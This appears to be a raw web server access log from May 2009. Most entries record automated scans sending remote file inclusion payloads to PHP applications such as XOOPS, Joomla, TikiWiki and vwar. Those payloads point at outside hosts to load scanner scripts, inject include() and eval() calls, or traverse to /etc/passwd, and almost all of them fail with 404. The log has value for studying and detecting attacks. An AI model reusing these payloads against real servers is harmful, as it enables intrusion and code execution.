122.116.178.20 - - [13/May/2009:05:16:29 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:05:16:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.175.201.250 - - [13/May/2009:05:16:44 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
213.175.201.250 - - [13/May/2009:05:16:53 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:05:16:54 -0400] "GET /logs/access_log.Q109020500//modules/xfsection/modify.php?dir_module=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET /logs/access_log.Q109022600//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET //viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET /logs//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:56 -0400] "GET /logs/access_log.Q108121900//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:16:59 -0400] "GET /logs/access_log.Q109041100//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:17:03 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:17:03 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:17:07 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
218.185.20.88 - - [13/May/2009:05:17:14 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
121.165.73.157 - - [13/May/2009:05:17:25 -0400] "GET /logs/error_log.Q108080800/errors.php?error=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
67.202.3.177 - - [13/May/2009:05:17:27 -0400] "GET /logs/access_log.Q108092600 HTTP/1.1" 404 224 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)"
121.101.159.29 - - [13/May/2009:05:18:00 -0400] "GET /logs//admin/templates/template_thumbnail.php?thumb_template=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:18:00 -0400] "GET /logs/access_log.Q108082700//admin/templates/template_thumbnail.php?thumb_template=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:18:00 -0400] "GET //admin/templates/template_thumbnail.php?thumb_template=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:18:28 -0400] "GET /logs/access_log.Q108083100//admin/templates/template_thumbnail.php?thumb_template=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
85.18.117.101 - - [13/May/2009:05:18:37 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
85.18.117.101 - - [13/May/2009:05:18:49 -0400] "GET /logs/access_log.Q108092700//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:18:49 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:19:04 -0400] "GET //includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:19:05 -0400] "GET /logs/access_log.Q109042500//includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:19:05 -0400] "GET /logs//includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.227.63.136 - - [13/May/2009:05:19:14 -0400] "GET /logs/access_log.Q108082400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
212.227.63.136 - - [13/May/2009:05:19:15 -0400] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
212.227.63.136 - - [13/May/2009:05:19:15 -0400] "GET //sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.227.63.136 - - [13/May/2009:05:19:30 -0400] "GET /logs/access_log.Q108110400//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:19:50 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:19:50 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:19:50 -0400] "GET /logs/access_log.Q108090900//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
190.144.44.36 - - [13/May/2009:05:20:12 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
190.144.44.36 - - [13/May/2009:05:20:12 -0400] "GET /logs/access_log.Q108090400%20%20/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [13/May/2009:05:20:12 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:05:20:30 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:05:20:31 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:05:20:31 -0400] "GET /logs/access_log.Q109022600//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:20:51 -0400] "GET /logs/access_log.Q108101700//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
84.32.195.2 - - [13/May/2009:05:21:11 -0400] "GET /logs/access_log.Q108112200//?_zb_path=http://www.nw.or.kr/bbs/icon/tukulid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
209.59.12.99 - - [13/May/2009:05:21:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
212.227.63.136 - - [13/May/2009:05:21:39 -0400] "GET /logs/access_log.Q108082400%20%20//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 294 "-" "Mozilla/5.0"
87.106.253.45 - - [13/May/2009:05:21:55 -0400] "GET //convert/mvcw.php?step=1&vwar_root=../../../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [13/May/2009:05:21:56 -0400] "GET /logs//convert/mvcw.php?step=1&vwar_root=../../../../../../../../etc/passwd HTTP/1.0" 404 220 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [13/May/2009:05:21:56 -0400] "GET /convert/mvcw.php?step=1&vwar_root=http://www.rabika.ru/hk? HTTP/1.0" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
87.106.253.45 - - [13/May/2009:05:21:56 -0400] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.rabika.ru/hk? HTTP/1.0" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:22:48 -0400] "GET //convert/mvcw.php?vwar_root=../../../../../../../../etc/passwd HTTP/1.0" 404 215 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:22:48 -0400] "GET /convert/mvcw.php?vwar_root=http://www.rabika.ru/hk? HTTP/1.0" 404 214 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:22:48 -0400] "GET /logs//convert/mvcw.php?vwar_root=../../../../../../../../etc/passwd HTTP/1.0" 404 220 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
206.225.92.50 - - [13/May/2009:05:22:48 -0400] "GET /logs/convert/mvcw.php?vwar_root=http://www.rabika.ru/hk? HTTP/1.0" 404 219 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008070400 SUSE/3.0.1-0.1 Firefox/3.0.1"
121.101.159.29 - - [13/May/2009:05:22:58 -0400] "GET /logs/access_log.Q109041300//includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
211.144.136.88 - - [13/May/2009:05:23:13 -0400] "GET /logs/access_log.Q109022600//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:23:31 -0400] "GET /logs/access_log.Q109030500//includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:23:32 -0400] "GET /logs/access_log.Q108110700//includes/header.php?c_temp_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
218.146.231.207 - - [13/May/2009:05:23:36 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:05:23:36 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.146.231.207 - - [13/May/2009:05:23:37 -0400] "GET /logs/access_log.Q108090900//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.210.42 - - [13/May/2009:05:23:53 -0400] "GET /logs/access_log.Q108090900%20%20//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
204.11.17.16 - - [13/May/2009:05:24:58 -0400] "GET /logs/access_log.Q108081200//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
204.11.17.16 - - [13/May/2009:05:24:58 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
204.11.17.16 - - [13/May/2009:05:24:59 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
204.11.17.16 - - [13/May/2009:05:25:01 -0400] "GET /logs/access_log.Q108012500//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
118.98.212.6 - - [13/May/2009:05:25:49 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
118.98.212.6 - - [13/May/2009:05:25:49 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.98.212.6 - - [13/May/2009:05:25:49 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.98.212.6 - - [13/May/2009:05:25:52 -0400] "GET /logs//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
118.98.212.6 - - [13/May/2009:05:25:52 -0400] "GET /logs/access_log.Q109022600%20%20//xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
118.98.212.6 - - [13/May/2009:05:25:52 -0400] "GET //xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:25:53 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:25:53 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:25:53 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:25:54 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
121.101.159.29 - - [13/May/2009:05:25:54 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
121.101.159.29 - - [13/May/2009:05:25:54 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
84.32.195.2 - - [13/May/2009:05:25:54 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
84.32.195.2 - - [13/May/2009:05:25:54 -0400] "GET /logs/access_log.Q108090900//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
121.101.159.29 - - [13/May/2009:05:25:54 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
216.176.196.171 - - [13/May/2009:05:25:55 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:25:55 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:25:56 -0400] "GET /logs/access_log.Q108090700%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
216.176.196.171 - - [13/May/2009:05:26:02 -0400] "GET /logs/access_log.Q109041200%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.geocities.com/cantikpuri/id.txt???? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
121.101.159.29 - - [13/May/2009:05:26:04 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:05:26:07 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:05:26:08 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
91.121.210.42 - - [13/May/2009:05:26:13 -0400] "GET /logs/access_log.Q109022600//skin/zero_vote/ask_password.php?dir=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
78.136.7.247 - - [13/May/2009:05:26:30 -0400] "GET /logs/access_log.Q108122800//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 271 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
209.59.12.99 - - [13/May/2009:05:26:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
78.136.7.247 - - [13/May/2009:05:26:30 -0400] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 244 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.101.159.29 - - [13/May/2009:05:26:32 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
211.144.136.88 - - [13/May/2009:05:26:35 -0400] "GET /logs//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:26:35 -0400] "GET /logs/access_log.Q109041100%20%20//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:26:35 -0400] "GET /logs/access_log.Q108121900%20%20//viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
211.144.136.88 - - [13/May/2009:05:26:38 -0400] "GET //viewbody.html?code=http://lwamus.com/fx29id.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
78.136.7.247 - - [13/May/2009:05:26:43 -0400] "GET /logs/access_log.Q108100600//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://biquad.com.br/catalog/products/1dd.txt?? HTTP/1.1" 404 271 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
121.101.159.29 - - [13/May/2009:05:26:43 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
121.101.159.29 - - [13/May/2009:05:26:45 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://www.stormpages.com/birulangi/idbiru.txt??? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
118.45.190.166 - - [13/May/2009:05:26:51 -0400] "GET /logs/access_log.Q108123000//index.php?str=http://ggch.hs.kr/zboard/data/2ts/v6id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
118.45.190.166 - - [13/May/2009:05:26:51 -0400] "GET /logs/access_log.Q109010100//index.php?str=http://ggch.hs.kr/zboard/data/2ts/v6id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.65"
118.45.190.166 - - [13/May/2009:05:26:51 -0400] "GET //index.php?str=http://ggch.hs.kr/zboard/data/2ts/v6id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.65"
118.45.190.166 - - [13/May/2009:05:26:51 -0400] "GET /logs//index.php?str=http://ggch.hs.kr/zboard/data/2ts/v6id.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.65"
132.68.208.23 - - [13/May/2009:05:26:58 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
132.68.208.23 - - [13/May/2009:05:26:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
132.68.208.23 - - [13/May/2009:05:27:02 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
132.68.208.23 - - [13/May/2009:05:27:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
121.165.73.157 - - [13/May/2009:05:27:07 -0400] "GET /logs/access_log.Q108081200//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:27:07 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:27:07 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:05:27:07 -0400] "GET /logs/access_log.Q108012500//modules/vwar/admin/admin.php?vwar_root=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
61.160.201.12 - - [13/May/2009:05:27:31 -0400] "GET /logs/access_log.Q108110900/errors.php?error=http://212.227.74.68/catalog/fx29id.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
